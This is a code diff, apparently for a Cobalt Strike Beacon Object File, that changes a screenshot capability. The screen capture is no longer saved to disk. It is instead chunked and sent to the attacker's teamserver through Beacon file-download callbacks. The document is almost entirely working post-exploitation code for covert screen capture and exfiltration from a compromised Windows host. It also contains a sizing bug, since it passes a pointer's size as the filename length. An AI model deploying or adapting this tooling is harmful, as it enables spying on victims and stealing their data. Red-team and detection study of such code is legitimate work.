|
5 | 5 | #pragma comment(lib, "User32.lib") |
6 | 6 | #pragma comment(lib, "Gdi32.lib") |
7 | 7 |
|
| 8 | +char downloadfilename[] = "screenshot.bmp"; |
| 9 | +/*Download File*/ |
| 10 | +void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { |
8 | 11 |
|
| 12 | + //Intializes random number generator to create fileId |
| 13 | + time_t t; |
| 14 | + MSVCRT$srand((unsigned)MSVCRT$time(&t)); |
| 15 | + int fileId = MSVCRT$rand(); |
| 16 | + |
| 17 | + //8 bytes for fileId and fileSize |
| 18 | + int messageLength = downloadFileNameLength + 8; |
| 19 | + char* packedData = (char*)MSVCRT$malloc(messageLength); |
| 20 | + |
| 21 | + //pack on fileId as 4-byte int first |
| 22 | + packedData[0] = (fileId >> 24) & 0xFF; |
| 23 | + packedData[1] = (fileId >> 16) & 0xFF; |
| 24 | + packedData[2] = (fileId >> 8) & 0xFF; |
| 25 | + packedData[3] = fileId & 0xFF; |
| 26 | + |
| 27 | + //pack on fileSize as 4-byte int second |
| 28 | + packedData[4] = (fileSize >> 24) & 0xFF; |
| 29 | + packedData[5] = (fileSize >> 16) & 0xFF; |
| 30 | + packedData[6] = (fileSize >> 8) & 0xFF; |
| 31 | + packedData[7] = fileSize & 0xFF; |
| 32 | + |
| 33 | + int packedIndex = 8; |
| 34 | + |
| 35 | + //pack on the file name last |
| 36 | + for (int i = 0; i < downloadFileNameLength; i++) { |
| 37 | + packedData[packedIndex] = fileName[i]; |
| 38 | + packedIndex++; |
| 39 | + } |
| 40 | + |
| 41 | + BeaconOutput(CALLBACK_FILE, packedData, messageLength); |
| 42 | + |
| 43 | + if (fileSize > (1024 * 900)) { |
| 44 | + |
| 45 | + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) |
| 46 | + int numOfChunks = (fileSize / (1024 * 900)) + 1; |
| 47 | + int index = 0; |
| 48 | + int chunkSize = 1024 * 900; |
| 49 | + |
| 50 | + while (index < fileSize) { |
| 51 | + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on |
| 52 | + |
| 53 | + /*First 4 are the fileId |
| 54 | + then account for length of file |
| 55 | + then a byte for the good-measure null byte to be included |
| 56 | + then lastly is the 4-byte int of the fileSize*/ |
| 57 | + int chunkLength = 4 + chunkSize; |
| 58 | + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); |
| 59 | + |
| 60 | + //pack on fileId as 4-byte int first |
| 61 | + packedChunk[0] = (fileId >> 24) & 0xFF; |
| 62 | + packedChunk[1] = (fileId >> 16) & 0xFF; |
| 63 | + packedChunk[2] = (fileId >> 8) & 0xFF; |
| 64 | + packedChunk[3] = fileId & 0xFF; |
| 65 | + |
| 66 | + int chunkIndex = 4; |
| 67 | + |
| 68 | + //pack on the file name last |
| 69 | + for (int i = index; i < index + chunkSize; i++) { |
| 70 | + packedChunk[chunkIndex] = returnData[i]; |
| 71 | + chunkIndex++; |
| 72 | + } |
| 73 | + |
| 74 | + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); |
| 75 | + |
| 76 | + } |
| 77 | + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements |
| 78 | + |
| 79 | + int lastChunkLength = fileSize - index + 4; |
| 80 | + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); |
| 81 | + |
| 82 | + //pack on fileId as 4-byte int first |
| 83 | + lastChunk[0] = (fileId >> 24) & 0xFF; |
| 84 | + lastChunk[1] = (fileId >> 16) & 0xFF; |
| 85 | + lastChunk[2] = (fileId >> 8) & 0xFF; |
| 86 | + lastChunk[3] = fileId & 0xFF; |
| 87 | + int lastChunkIndex = 4; |
| 88 | + |
| 89 | + //pack on the file name last |
| 90 | + for (int i = index; i < fileSize; i++) { |
| 91 | + lastChunk[lastChunkIndex] = returnData[i]; |
| 92 | + lastChunkIndex++; |
| 93 | + } |
| 94 | + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); |
| 95 | + } |
| 96 | + |
| 97 | + index = index + chunkSize; |
| 98 | + |
| 99 | + } |
| 100 | + |
| 101 | + } |
| 102 | + else { |
| 103 | + |
| 104 | + /*first 4 are the fileId |
| 105 | + then account for length of file |
| 106 | + then a byte for the good-measure null byte to be included |
| 107 | + then lastly is the 4-byte int of the fileSize*/ |
| 108 | + int chunkLength = 4 + fileSize; |
| 109 | + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); |
| 110 | + |
| 111 | + //pack on fileId as 4-byte int first |
| 112 | + packedChunk[0] = (fileId >> 24) & 0xFF; |
| 113 | + packedChunk[1] = (fileId >> 16) & 0xFF; |
| 114 | + packedChunk[2] = (fileId >> 8) & 0xFF; |
| 115 | + packedChunk[3] = fileId & 0xFF; |
| 116 | + int chunkIndex = 4; |
| 117 | + |
| 118 | + //pack on the file name last |
| 119 | + for (int i = 0; i < fileSize; i++) { |
| 120 | + packedChunk[chunkIndex] = returnData[i]; |
| 121 | + chunkIndex++; |
| 122 | + } |
| 123 | + |
| 124 | + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); |
| 125 | + } |
| 126 | + |
| 127 | + |
| 128 | + //We need to tell the teamserver that we are done writing to this fileId |
| 129 | + char packedClose[4]; |
| 130 | + |
| 131 | + //pack on fileId as 4-byte int first |
| 132 | + packedClose[0] = (fileId >> 24) & 0xFF; |
| 133 | + packedClose[1] = (fileId >> 16) & 0xFF; |
| 134 | + packedClose[2] = (fileId >> 8) & 0xFF; |
| 135 | + packedClose[3] = fileId & 0xFF; |
| 136 | + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); |
| 137 | + |
| 138 | + return; |
| 139 | +} |
9 | 140 |
|
10 | 141 | #pragma region error_handling |
11 | 142 | #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) |
@@ -80,31 +211,39 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) |
80 | 211 | ReleaseDC(NULL, hDC); |
81 | 212 | } |
82 | 213 |
|
83 | | - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, |
84 | | - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
| 214 | + //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); |
85 | 215 |
|
86 | | - if (fh == INVALID_HANDLE_VALUE) |
87 | | - return FALSE; |
| 216 | + //if (fh == INVALID_HANDLE_VALUE) |
| 217 | + // return FALSE; |
88 | 218 |
|
89 | 219 | bmfHdr.bfType = 0x4D42; // "BM" |
90 | 220 | dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; |
91 | 221 | bmfHdr.bfSize = dwDIBSize; |
92 | 222 | bmfHdr.bfReserved1 = 0; |
93 | 223 | bmfHdr.bfReserved2 = 0; |
94 | 224 | bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; |
| 225 | + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); |
| 226 | + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); |
| 227 | + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); |
| 228 | + |
95 | 229 |
|
96 | | - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); |
| 230 | + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); |
| 231 | + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); |
97 | 232 |
|
98 | | - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); |
| 233 | + /* clean up */ |
99 | 234 | GlobalUnlock(hDib); |
100 | 235 | GlobalFree(hDib); |
101 | | - CloseHandle(fh); |
| 236 | + //CloseHandle(fh); |
102 | 237 | return TRUE; |
103 | 238 | } |
104 | 239 |
|
105 | 240 | #ifdef BOF |
106 | 241 | void go(char* buff, int len) { |
107 | | - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); |
| 242 | + datap parser; |
| 243 | + char * downloadfilename; |
| 244 | + BeaconDataParse(&parser, buff, len); |
| 245 | + downloadfilename = BeaconDataExtract(&parser, NULL); |
| 246 | + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); |
108 | 247 | int x1, y1, x2, y2, w, h; |
109 | 248 | // get screen dimensions |
110 | 249 | x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); |
@@ -132,10 +271,10 @@ void go(char* buff, int len) { |
132 | 271 | */ |
133 | 272 |
|
134 | 273 | BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); |
135 | | - LPCSTR filename = "screenshot.bmp"; |
| 274 | + LPCSTR filename = (LPCSTR)downloadfilename; |
136 | 275 | SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); |
137 | 276 |
|
138 | | - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); |
| 277 | + //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename); |
139 | 278 | // clean up |
140 | 279 | SelectObject(hDC, old_obj); |
141 | 280 | DeleteDC(hDC); |
|
0 commit comments